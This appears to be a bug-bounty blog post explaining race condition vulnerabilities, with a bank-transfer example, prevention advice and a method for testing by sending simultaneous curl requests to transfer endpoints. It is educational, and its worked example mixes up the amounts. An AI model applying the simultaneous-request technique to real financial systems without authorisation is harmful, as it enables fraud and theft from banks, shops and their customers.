Race conditions : bug bounties
Race conditions vulnerabilities, in my opinon, are one of the most interesting web vulnerabilities. They arise from the simplest mistakes developers make and these mistakes have proved costly.
In the past, hackers have used race conditions to steal money from online banks, cryptocurrency exchanges websites , e-commerce websites and more.
What are race conditions?
- Race conditions arise when two sections of code that are designed to be executed in a sequence, get executed out of sequence.
- In order to understand these vulnerabilities better, you must first understand concept of concurrency.
What is concurrency?
- In computer programming, concurrency is the ability to executes different parts of code simultaneously without affecting the outcome of the program.
- Concurrency has two types: multiprocessing and multithreading.
- Multiprocessing refers to using multiple CPUs to perform simultaneous tasks.
- However, multithreading is when a single CPU performs the simultaneous tasks by using “threads”. However, this threads don’t actually execute at the same time; they take turns using the CPU’s power. When one thread is idle, other threads can continue taking advantage of the unused computing resources. Arranging the sequence of execution of multiple threads is called scheduling.
- This scheduling is what causes race conditions.
When does a race condition become a vulnerability?
- A race condition becomes a vulnerability when it affects a security control mechanism.
- Imagine two threads are executing the transfer of money between bank accounts. The application would have to perform three tasks to transfer the money correctly. First, it checks if the originating account has enough money, then it adds the money to the destination account , and lastly, it substracts the amount from the originating account.
So, the process of executing two threads for transferring 100$ from A to B should look a little like this
THREAD 1
- Check account balance of A(>100$); 2. Add 100$ to account B; 3. Deduct 100$ from account A
THREAD 2
- Check account balance of A (<100$) => Transfer fails , insufficient funds.
However, this same process with a race condition vulnerability, would look like this:
- [Thread 1] Check account A balance (100$);
- [Thread 2] Check account A balance (100$);
- [Thread 1] Add 500$ to account B ; [100$ in A, 100$ in B]
- [Thread 2] Add 500$ to account B; [100$ in A, 200$ in B]
- [Thread 1] Deduct 500$ from account A; [0$ in A; 200$ in B]
- [Thread 2] Deduct 500$ from account A; [0$ in A; 200$ in B]
So, if you’ve noticed, instead of having 0$ in A and 100$ in B, we have 0$ in A but 200$ in B.
Although race conditions vulnerabilities are mostly associated with financial websites, hackers can use them in other situations too, like rigging online voting campaigns.
How to prevent
The concept of synchronization is important when it comes to concurrency in programming. It involves ensuring that threads or processes do not access shared resources simultaneously, as this can lead to race conditions and data inconsistencies. One way to achieve synchronization is through the use of resource locks, which block other threads from accessing a resource until the thread holding the lock is finished with it.
In addition to synchronization, it is also important to follow secure coding practices to prevent race conditions from becoming more severe security issues. The principle of least privilege is one such practice, which involves granting applications and processes only the privileges they need to complete their tasks. For example, if an application only needs to read a file, it should not be granted write or execute permissions. This reduces the risks of system compromise during an attack.
How to hunt?
1. Find features prone to race conditions :
- Race conditions often occur in features that involve updating numerical values, such as online voting, gaming scores, bank transfers, e-commerce payments, and gift card balances. To identify these features in an application, you can look for requests that are involved in updating these numbers. For example, if you want to test the request used to transfer money from a banking site, you can copy the request using Burp Suite by right-clicking it and selecting “Copy as curl command.”
2. Send simultaneous requests
- To test for and potentially exploit race conditions in a target, you can send multiple requests to the server at the same time. For instance, if you want to check if it is possible to transfer more money than you have in your bank account, you can use the curl command to send multiple requests for a transfer simultaneously. One way to do this is to copy the command from Burp, paste it into the terminal, and then insert an “&” symbol between each command. This will allow you to execute multiple commands simultaneously in the background on a Linux system.
curl (transfer $3000) & curl (transfer $3000) & curl (transfer $3000)
& curl (transfer $3000) & curl (transfer $3000) & curl (transfer $3000)
- Be sure to test for operations that should be allowed only once. For example if you have a bank account with the balance of 3000$, testing to transfer 5000$ in pointless, due to the fact that no single request would be allowed. But testing a transfer of 10$ multiple times is also pointless, since you should be able to do that even without a race condition.
3. Check the results
- This is a no-brainer, check if your attack succeeded
Escalating the vulnerability
It is important to consider the potential impact of a race condition on the affected functionality when evaluating the severity of the vulnerability. A race condition that allows an attacker to gain unlimited access to financial resources, such as through cash withdrawal or fund transfer, could be highly detrimental to both the affected individuals and the organization.
In addition to financial gain, an attacker may be able to use a race condition to gain social influence or access to sensitive information. For example, a race condition that allows an attacker to gain unauthorized access to a social media account could potentially be used to spread misinformation or manipulate public opinion.
When reporting on the impact of a race condition, it is important to clearly articulate the potential consequences for the affected individuals and the organization. This may include the potential financial loss, loss of sensitive information, or damage to the organization’s reputation. Providing clear and detailed information about the potential impact of the vulnerability can help prioritize its resolution and mitigate the potential consequences.
I hope this blog post has helped! Happy hunting and merry Christmas!